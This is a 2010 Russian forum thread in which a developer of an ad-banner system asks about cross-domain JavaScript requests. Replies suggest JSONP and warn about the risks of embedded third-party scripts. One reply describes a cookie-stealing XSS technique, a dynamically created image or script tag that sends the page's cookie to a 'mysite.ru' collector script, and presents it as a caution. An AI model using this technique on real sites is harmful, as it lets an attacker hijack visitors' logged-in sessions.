|
|
|
Кроссдоменные запросы в javascript
|
|||
|---|---|---|---|
|
#18+
Всем привет. Пишу баннерную систему. Возник вопрос по кроссдоменным запросам. Как провильно это реализовать? Заранее спасибо ... |
|||
|
:
Нравится:
Не нравится:
|
|||
| 20.05.2010, 17:52:29 |
|
||
|
Кроссдоменные запросы в javascript
|
|||
|---|---|---|---|
|
#18+
jsonp ... |
|||
|
:
Нравится:
Не нравится:
|
|||
| 20.05.2010, 18:08:58 |
|
||
|
Кроссдоменные запросы в javascript
|
|||
|---|---|---|---|
|
#18+
jsopn Я расматривал, так и не понял как он работает. Можно какой нибуть пример расмотреть более подробный. Если можно ссылку или скрипт. ... |
|||
|
:
Нравится:
Не нравится:
|
|||
| 20.05.2010, 18:24:49 |
|
||
|
Кроссдоменные запросы в javascript
|
|||
|---|---|---|---|
|
#18+
/topic/711302&hl=jsonp#7925001 ... |
|||
|
:
Нравится:
Не нравится:
|
|||
| 20.05.2010, 19:08:14 |
|
||
|
Кроссдоменные запросы в javascript
|
|||
|---|---|---|---|
|
#18+
Спасибо. буду юзать ... |
|||
|
:
Нравится:
Не нравится:
|
|||
| 20.05.2010, 19:43:02 |
|
||
|
Кроссдоменные запросы в javascript
|
|||
|---|---|---|---|
|
#18+
А зачем для баннерной системы такая фича? Кукисы, что-ли тырить? ... |
|||
|
:
Нравится:
Не нравится:
|
|||
| 21.05.2010, 09:43:11 |
|
||
|
Кроссдоменные запросы в javascript
|
|||
|---|---|---|---|
|
#18+
Кукисы? вы имели введу Cookies. Такая система мне нужно, для того чтобы моя баннерная система не влияла на время загрузки страницы пользователя. Хочу сделать типа такую вещь ссылка выполнела запрос на получение js скрипта -> а полученый скрипт средствами Ajax совершил запрос на сервер к php файлу -> после результатом запроса сгенерируется баннер который разместица на странице пользователя. Почему хочу сделать всё через Ajax? 1)Чтобы не беспокоили боты 2) Баннер подгружался в последнию очередь ... |
|||
|
:
Нравится:
Не нравится:
|
|||
| 21.05.2010, 11:21:32 |
|
||
|
Кроссдоменные запросы в javascript
|
|||
|---|---|---|---|
|
#18+
Nechto, Наличие аякса в данном случае - сомнительная необходимость, потому что нет никакой проблемы загрузить картинку без перезагрузки страницы (впрочем и яваскрипт тоже). Достаточно изменить урл в её свойстве срц. А вот доступ из-под баннера к чужой странице - зло ещё то. Например, если бы такой баннер был бы размещён на этой странице, я смог бы без проблем подлогинится под любым пользователем, сюда заглянувшим. :( ... |
|||
|
:
Нравится:
Не нравится:
|
|||
| 21.05.2010, 11:39:00 |
|
||
|
Кроссдоменные запросы в javascript
|
|||
|---|---|---|---|
|
#18+
Ну, может, я не понял чего. Может, понял с точностью до наоборот. Страница с баннерами Ваша или страница - чужая, а баннеры Ваши? Чё-то не понимаю я такого слова "баннерная система". ... |
|||
|
:
Нравится:
Не нравится:
|
|||
| 21.05.2010, 11:56:00 |
|
||
|
Кроссдоменные запросы в javascript
|
|||
|---|---|---|---|
|
#18+
авторНапример, если бы такой баннер был бы размещён на этой странице, я смог бы без проблем подлогинится под любым пользователем, сюда заглянувшим Это мне нравится :) авторБаннерная система это мой рекламная система. Принцип её работы такой же как реклама яндек гугл. ... |
|||
|
:
Нравится:
Не нравится:
|
|||
| 23.05.2010, 11:08:00 |
|
||
|
Кроссдоменные запросы в javascript
|
|||
|---|---|---|---|
|
#18+
Если такие дела с Аджакс, то действительно его лучше не использовать. Получается если пользователь размещает на своей странице мой скрипт. То я имею доступ к: кукам, к его javascriptam, html формам. Я правильно понял ... |
|||
|
:
Нравится:
Не нравится:
|
|||
| 23.05.2010, 11:11:55 |
|
||
|
Кроссдоменные запросы в javascript
|
|||
|---|---|---|---|
|
#18+
NechtoПолучается если пользователь размещает на своей странице мой скрипт. То я имею доступ к: кукам, к его javascriptam, html формам. Я правильно понялПравильно. Например, на этом форуме у залогиненого юзера с опцией "запомнить" есть кукис af_remember. Тогда в своем скрипте вы можете создать элемент img или script, в src поместить что-то вроде "http://mysite.ru/1.php?cook="+cookievalue, а на своем сайте mysite.ru в 1.php принять и сохранить значение кукиса. Это простейший пример XSS-атаки. Потому не допускайте на свой сайт всякие посторонние скрипты непонятно от кого, если у вас есть система авторизации и всё такое. ps: если вы создадите страничку, в которой в iframe загружается sql.ru, вы не будете иметь доступ к документу sql.ru из кода js на вашей страничке, т.к. разные домены. Потому такой простой вариант не прокатывает. ) ... |
|||
|
:
Нравится:
Не нравится:
|
|||
| 23.05.2010, 17:28:19 |
|
||
|
Кроссдоменные запросы в javascript
|
|||
|---|---|---|---|
|
#18+
Очень полезная статья оказалась. Очень много для себя узнал. Раз я пишу баннерную рекламу, то мне это очень пригодится. На этом надо будет сделать сделать акцент, при описании работы системы. Спасибо всем!!! ... |
|||
|
:
Нравится:
Не нравится:
|
|||
| 23.05.2010, 22:05:46 |
|
||
|
Кроссдоменные запросы в javascript
|
|||
|---|---|---|---|
|
#18+
Яростный МечПотому не допускайте на свой сайт всякие посторонние скрипты непонятно от кого, если у вас есть система авторизации и всё такое. Только плагины от Ярмеча можно. Кстати, проверил от конякулы, вроде ничего такого не нашёл. Всё равно запускать стрёмно. Мало-ли просмотрел какой-нибудь креате.элемент+аппендЧилд. ... |
|||
|
:
Нравится:
Не нравится:
|
|||
| 24.05.2010, 09:51:07 |
|
||
|
Кроссдоменные запросы в javascript
|
|||
|---|---|---|---|
|
#18+
ShSergeКстати, проверил от конякулы, вроде ничего такого не нашёл. Всё равно запускать стрёмно. Мало-ли просмотрел какой-нибудь креате.элемент+аппендЧилд.По сути, Конякула просто пояснил, как плагин Макса Про настроить в Опере. Так что все вопросы к Max Pro. В моем ничего такого нет, можешь проверить, код небольшой и ничего постороннего не подгружает :) ... |
|||
|
:
Нравится:
Не нравится:
|
|||
| 24.05.2010, 10:15:31 |
|
||
|
Кроссдоменные запросы в javascript
|
|||
|---|---|---|---|
|
#18+
Яростный МечВ моем ничего такого нет, можешь проверить, код небольшой и ничего постороннего не подгружает :)Да, поскольку он приложен как файл к посту, я не могу его незаметно поменять. :) ... |
|||
|
:
Нравится:
Не нравится:
|
|||
| 24.05.2010, 10:17:12 |
|
||
|
|

start [/forum/topic.php?fid=22&msg=36644709&tid=1453058]: |
0ms |
get settings: |
9ms |
get forum list: |
15ms |
check forum access: |
3ms |
check topic access: |
3ms |
track hit: |
180ms |
get topic data: |
9ms |
get forum data: |
2ms |
get page messages: |
57ms |
get tp. blocked users: |
2ms |
| others: | 184ms |
| total: | 464ms |

| 0 / 0 |
